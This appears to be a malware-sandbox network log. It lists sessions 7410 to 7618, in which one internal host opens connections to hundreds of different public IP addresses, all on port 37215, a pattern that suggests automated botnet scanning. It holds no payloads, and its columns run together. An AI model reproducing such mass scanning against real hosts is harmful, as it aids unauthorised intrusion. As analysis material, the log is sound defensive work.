                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7410192.168.2.1348656197.240.233.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7411192.168.2.1339282157.48.42.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7412192.168.2.1334466158.231.132.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7413192.168.2.134501041.212.157.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7414192.168.2.1347276101.234.193.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7415192.168.2.134338641.145.21.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7416192.168.2.134256441.151.33.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7417192.168.2.1341240157.176.180.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7418192.168.2.133386841.104.142.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7419192.168.2.134867641.53.26.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7420192.168.2.1351196197.131.207.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7421192.168.2.1358622157.191.18.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7422192.168.2.1344368144.172.242.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7423192.168.2.1356764197.0.130.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7424192.168.2.134781841.101.184.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7425192.168.2.1359380157.205.30.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7426192.168.2.1354268157.152.39.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7427192.168.2.1349806157.12.10.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7428192.168.2.135269641.245.255.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7429192.168.2.1345474157.103.98.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7430192.168.2.1352434157.178.251.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7431192.168.2.1337840104.123.118.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7432192.168.2.1343762197.62.205.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7433192.168.2.1337104138.71.130.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7434192.168.2.1336682197.123.77.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7435192.168.2.1348208157.133.143.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7436192.168.2.133747841.86.48.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7437192.168.2.1333356157.179.137.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7438192.168.2.1353470197.108.134.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7439192.168.2.133752641.29.7.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7440192.168.2.1357812157.182.5.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7441192.168.2.1356208149.48.58.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7442192.168.2.1333430157.234.162.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7443192.168.2.133531841.21.213.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7444192.168.2.134263041.44.48.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7445192.168.2.1359706197.151.247.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7446192.168.2.1356796108.116.185.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7447192.168.2.1350672157.232.184.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7448192.168.2.133950841.173.143.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7449192.168.2.1352168197.191.118.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7450192.168.2.1336184146.70.99.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7451192.168.2.13418189.212.245.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7452192.168.2.1359972157.177.7.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7453192.168.2.135539424.135.37.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7454192.168.2.134994641.110.191.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7455192.168.2.135906641.91.182.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7456192.168.2.1358910197.107.99.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7457192.168.2.134514041.132.186.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7458192.168.2.1334010197.36.157.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7459192.168.2.134682041.107.69.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7460192.168.2.1333614197.83.28.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7461192.168.2.135419423.52.175.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7462192.168.2.1358182209.220.217.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7463192.168.2.1342386197.248.252.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7464192.168.2.1351902157.240.243.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7465192.168.2.1337712157.55.20.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7466192.168.2.1360604197.134.195.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7467192.168.2.135792241.66.135.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7468192.168.2.1351170197.70.72.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7469192.168.2.134483641.215.177.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7470192.168.2.1348202197.6.223.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7471192.168.2.1347190157.142.165.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7472192.168.2.134173841.220.158.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7473192.168.2.1342298213.253.108.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7474192.168.2.1337086103.64.43.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7475192.168.2.1347470197.29.189.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7476192.168.2.134345041.27.90.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7477192.168.2.1338070118.48.48.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7478192.168.2.133481264.26.118.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7479192.168.2.1354224197.53.212.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7480192.168.2.134903475.232.84.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7481192.168.2.1339746157.57.185.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7482192.168.2.1347538222.228.179.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7483192.168.2.1348480130.234.93.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7484192.168.2.1342984151.114.32.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7485192.168.2.13568669.202.108.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7486192.168.2.1335210157.168.245.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7487192.168.2.135469050.20.115.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7488192.168.2.135769841.220.12.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7489192.168.2.1354274157.12.6.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7490192.168.2.1349446157.242.62.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7491192.168.2.1350034157.228.139.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7492192.168.2.133663241.48.200.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7493192.168.2.1345274217.167.171.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7494192.168.2.134747841.152.149.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7495192.168.2.134812241.223.124.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7496192.168.2.1341534157.103.12.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7497192.168.2.134133241.195.84.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7498192.168.2.1358696157.55.250.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7499192.168.2.133811041.85.219.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7500192.168.2.1345114157.52.74.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7501192.168.2.1340546163.97.237.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7502192.168.2.135346041.110.196.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7503192.168.2.134613441.6.3.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7504192.168.2.135891041.238.131.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7505192.168.2.134103241.164.207.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7506192.168.2.134591641.142.186.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7507192.168.2.1342516197.176.41.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7508192.168.2.134969881.86.112.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7509192.168.2.1337298157.130.228.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7510192.168.2.133427695.71.223.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7511192.168.2.133906441.224.166.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7512192.168.2.134165041.173.82.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7513192.168.2.1350222197.219.5.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7514192.168.2.1338482197.190.143.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7515192.168.2.134050641.58.217.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7516192.168.2.135997841.47.4.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7517192.168.2.13563484.129.181.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7518192.168.2.1333482197.234.18.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7519192.168.2.1344962197.236.24.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7520192.168.2.1337568105.232.128.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7521192.168.2.1341896157.108.6.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7522192.168.2.1334224157.242.15.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7523192.168.2.1352824197.126.129.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7524192.168.2.1350006157.42.213.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7525192.168.2.1342082197.253.37.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7526192.168.2.134864441.41.167.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7527192.168.2.1358530197.209.223.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7528192.168.2.1337826157.114.253.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7529192.168.2.1345038157.117.195.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7530192.168.2.134536041.24.195.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7531192.168.2.136017641.76.9.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7532192.168.2.135850460.29.223.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7533192.168.2.1334212157.74.223.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7534192.168.2.135014241.212.219.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7535192.168.2.133416012.234.17.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7536192.168.2.1350418175.204.210.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7537192.168.2.1346126157.228.205.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7538192.168.2.13344789.43.48.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7539192.168.2.1357956157.229.207.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7540192.168.2.1359322181.173.155.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7541192.168.2.1356244137.104.238.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7542192.168.2.1338320197.109.252.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7543192.168.2.1345990157.230.211.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7544192.168.2.1360326115.193.146.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7545192.168.2.1335206157.124.7.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7546192.168.2.1341068157.86.252.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7547192.168.2.1350090121.155.37.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7548192.168.2.1353708136.245.165.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7549192.168.2.136032041.150.210.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7550192.168.2.134108241.94.175.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7551192.168.2.134268641.36.78.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7552192.168.2.1346266185.130.54.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7553192.168.2.1333972157.82.94.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7554192.168.2.1335400197.57.2.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7555192.168.2.1346642197.48.43.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7556192.168.2.133767241.20.220.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7557192.168.2.134879041.245.7.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7558192.168.2.134821099.223.158.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7559192.168.2.136021669.117.171.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7560192.168.2.1358360197.249.59.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7561192.168.2.1336428157.165.122.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7562192.168.2.1341318182.146.71.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7563192.168.2.1359644108.39.251.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7564192.168.2.1342852157.116.115.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7565192.168.2.1336812157.145.140.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7566192.168.2.134392441.175.90.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7567192.168.2.1344128157.218.16.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7568192.168.2.133737041.111.136.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7569192.168.2.1340948157.34.167.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7570192.168.2.1356490167.147.139.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7571192.168.2.1333640197.173.166.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7572192.168.2.1341378197.137.228.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7573192.168.2.1346984197.86.114.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7574192.168.2.1349828197.152.173.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7575192.168.2.133372641.58.156.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7576192.168.2.1354556150.126.102.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7577192.168.2.1342730157.193.210.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7578192.168.2.133883241.79.29.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7579192.168.2.135388641.82.142.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7580192.168.2.1348728197.127.218.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7581192.168.2.1337190132.203.144.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7582192.168.2.133811819.100.233.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7583192.168.2.1345262157.80.104.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7584192.168.2.1352854188.184.38.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7585192.168.2.135450441.65.56.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7586192.168.2.134126241.147.62.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7587192.168.2.1342492157.113.214.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7588192.168.2.1358430197.114.67.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7589192.168.2.134055841.242.221.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7590192.168.2.1345138197.25.198.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7591192.168.2.134623857.171.226.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7592192.168.2.1358656197.105.132.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7593192.168.2.1338800165.154.196.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7594192.168.2.134268641.218.217.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7595192.168.2.134273441.84.84.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7596192.168.2.1356240157.156.44.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7597192.168.2.133791241.35.153.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7598192.168.2.1352012197.228.9.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7599192.168.2.1357886164.106.36.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7600192.168.2.134225441.91.18.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7601192.168.2.1343576219.180.25.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7602192.168.2.134479837.68.42.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7603192.168.2.133768241.230.22.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7604192.168.2.1348988203.121.208.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7605192.168.2.135883634.2.17.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7606192.168.2.133586241.206.65.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7607192.168.2.135516841.152.225.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7608192.168.2.1345844197.219.59.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7609192.168.2.1334036157.56.167.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7610192.168.2.134479841.55.207.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7611192.168.2.135843841.75.109.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7612192.168.2.1357986157.238.251.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7613192.168.2.1356370157.214.236.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7614192.168.2.1339258197.26.34.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7615192.168.2.133948862.19.16.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7616192.168.2.1353182192.190.51.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7617192.168.2.1337182157.252.218.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7618192.168.2.135288841.37.147.5437215
                                                  TimestampBytes transferredDirectionData


